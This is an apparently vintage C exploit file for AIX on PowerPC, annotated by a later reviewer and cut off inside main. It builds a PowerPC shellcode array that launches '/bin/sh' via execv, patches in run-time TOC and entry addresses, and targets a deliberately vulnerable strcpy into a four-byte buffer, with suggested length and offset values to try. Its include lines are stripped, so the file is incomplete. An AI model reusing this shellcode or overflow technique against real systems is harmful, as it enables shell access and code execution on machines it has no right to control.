/*
 * If the program gives you 'Segmentation fault' or 'Illegal instruction',
 * then try at least the following arguments
 * (string length, offset, kludge1, kludge2):
 *   78 40 1 1
 *   78 40 1 0
 *   78 40 0 0
 *   78 40 0 1
 *
 * Compile with: cc -g test.c
 * try:
 *   ./a.out 78 40 1 1
 *   ./a.out 78 40 0 0
 *   ./a.out 78 40 0 1
 *   ./a.out 78 40 0 0
 */

/*
 * NOTE(review): the two #include directives below lost their header names
 * during extraction (the angle-bracketed text was stripped). They are
 * reproduced as found; the original header names cannot be recovered from
 * this page, so the file will not preprocess until they are restored.
 */
#include
#include

/*
 * sh2: a small routine whose body mirrors, in C, the constants that main()
 * embeds in its code[] array (0xf0192c48, 0xd0024c0c and the two words that
 * encode the string "/bin/sh"). It is not called from anywhere in this view.
 *
 * Review notes (defects as written):
 *  - junk[0x100] = 0x11 writes one element past the end of junk[0x100]
 *    (valid indices are 0..0xff): out-of-bounds write, undefined behaviour.
 *  - toc and ctr are assigned but never read; the compiler may drop the stores.
 *  - execv(&s, 0): &s has type int (*)[2] while execv expects const char *,
 *    and a null argv is not portable (POSIX expects a NULL-terminated array).
 *  - s[0]/s[1] only read as "/bin/sh" followed by a NUL byte when the words
 *    are stored big-endian (as on the AIX/PowerPC target this file prints for).
 */
void sh2()
{
    int junk[0x100];
    int s[2];
    int toc;
    int ctr;
    junk[0x100]=0x11;        /* index 0x100 is one past the end of junk: OOB write (UB) */
    toc=0xf0192c48;          /* same value that sits in the immediates of code[3]/code[4] in main() */
    ctr=0xd0024c0c;          /* same value that sits in the immediates of code[6]/code[7] in main() */
    s[0]=0x2f62696e;         /* bytes "/bin" when stored big-endian */
    s[1]=0x2f736800;         /* bytes "/sh\0" when stored big-endian */
    execv(&s,0);             /* incompatible pointer type for &s; argv == 0 is non-portable */
}

/*
 * buggy: the intentionally vulnerable target of this test program.
 *
 * @param s  NUL-terminated string that is copied, unbounded, into a 4-byte
 *           local array.
 *
 * Review notes:
 *  - strcpy(a, s) performs no length check: any s longer than 3 characters
 *    (plus the terminating NUL) overruns a[] and overwrites whatever the
 *    compiler placed after it in the frame. In production code this is the
 *    classic stack-smashing bug; the fix is a bounded copy with an explicit
 *    length check, e.g. snprintf(a, sizeof a, "%s", s) and rejecting
 *    truncated input.
 *  - junk[] is never written, so if (junk[20]) reads an uninitialised value
 *    (UB); presumably it exists only to enlarge the stack frame — confirm.
 */
void buggy(char *s)
{
    char a[4];
    unsigned int junk[150];
    strcpy(a,s);             /* unbounded copy into a 4-byte buffer */
    puts("Over");
    if(junk[20]) puts("P");  /* reads uninitialised memory */
}

/*
 * main: builds the test input for buggy(); the remainder of the function is
 * outside this view.
 *
 * Arguments, per the file header: argv[1] string length (defaults to 78 when
 * atoi() yields 0), argv[2] offset (defaults to 40), argv[3] kludge1 (carry1),
 * argv[4] kludge2 (carry2); carry1/carry2 default to 1.
 *
 * NOTE: the body of main continues past the end of this chunk (it is cut off
 * inside the `for(nop=0; ...` loop header); only the visible part is commented.
 *
 * Review notes:
 *  - No return type (implicit int) — invalid since C99.
 *  - argc is never checked: argv[argc] is NULL, so if (argv[3]) / if (argv[4])
 *    read past the end of argv when fewer arguments are given, and
 *    atoi(argv[1]) dereferences NULL when the program runs without arguments
 *    (all UB). Compare each index against argc before reading.
 *  - pt = (unsigned *)&execv reinterprets a function address as two data
 *    words; on AIX this is presumably the function descriptor (entry word,
 *    then TOC word) — confirm against the target ABI. Strict-aliasing UB on
 *    any compiler that enforces it.
 *  - The halfword indices 7, 9, 13, 15 select the low halves of code[3],
 *    code[4], code[6], code[7] only on a big-endian target.
 *  - The printf label says CTR but the variable printed is eco.
 *  - i and buf[] are unused in the visible portion.
 */
main(int argc,char **argv)
{
    unsigned int junk[300];
    /* 32-bit words treated as machine code (the header warns about
       'Illegal instruction'). code[3]/code[4] initially hold the immediates
       0xf019/0x2c48 and code[6]/code[7] hold 0xd002/0x4c0c — the constants
       sh2() assigns to toc and ctr — and are overwritten below. */
    unsigned int code[]={
        0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x30632c48 ,
        0x90610440 , 0x3c60d002 , 0x30634c0c , 0x90610444 , 0x3c602f62 ,
        0x3063696e , 0x90610438 , 0x3c602f73 , 0x30636801 , 0x3863ffff ,
        0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
        0x7c0903a6 , 0x4e800420 , 0x0
    };
    unsigned int buf[600];
    unsigned int i,nop,mn;
    int max;
    unsigned int toc;
    unsigned int eco;
    unsigned int *pt;
    int carry1=1;
    int carry2=1;
    pt=(unsigned *) &execv;              /* function address read as data */
    toc=*(pt+1);                         /* second word, printed below as TOC */
    eco=*pt;                             /* first word, printed below as CTR */
    if (argv[3]) carry1=atoi(argv[3]);   /* not checked against argc */
    if (argv[4]) carry2=atoi(argv[4]);   /* not checked against argc */
    max=atoi(argv[1]);                   /* NULL dereference when argc < 2 */
    if(max==0) max=78;                   /* also silently accepts non-numeric input */
    mn=40;
    if(argv[2]) mn=atoi(argv[2]);
    /* Overwrite the immediates in code[] with the run-time values, using
       big-endian halfword indexing: halfword 9 is the low half of code[4] and
       halfword 7 the low half of code[3] (toc); halfword 15 is the low half of
       code[7] and halfword 13 the low half of code[6] (eco). carry1/carry2
       (the 'kludge' arguments) are added to the high halves; their purpose is
       not stated anywhere in this file. */
    *((unsigned short *)code +9)=(unsigned short) (toc & 0x0000ffff);
    *((unsigned short *)code +7)=carry1+(unsigned short) ((toc >> 16) & 0x0000ffff);
    *((unsigned short *)code +15)=(unsigned short) (eco & 0x0000ffff);
    *((unsigned short *)code +13)=carry2+(unsigned short) ((eco >> 16) & 0x0000ffff);
    puts("Test AIX!");
    puts("Discovered and coded by G.G.");
    printf("TOC:%0x,CTR:%0x\n",toc,eco); /* label "CTR" prints eco */
    junk[50]=1;                          /* presumably keeps junk[] from being elided — confirm */
    /* The loop below, and the rest of main(), continue beyond this chunk. */
    for(nop=0;nop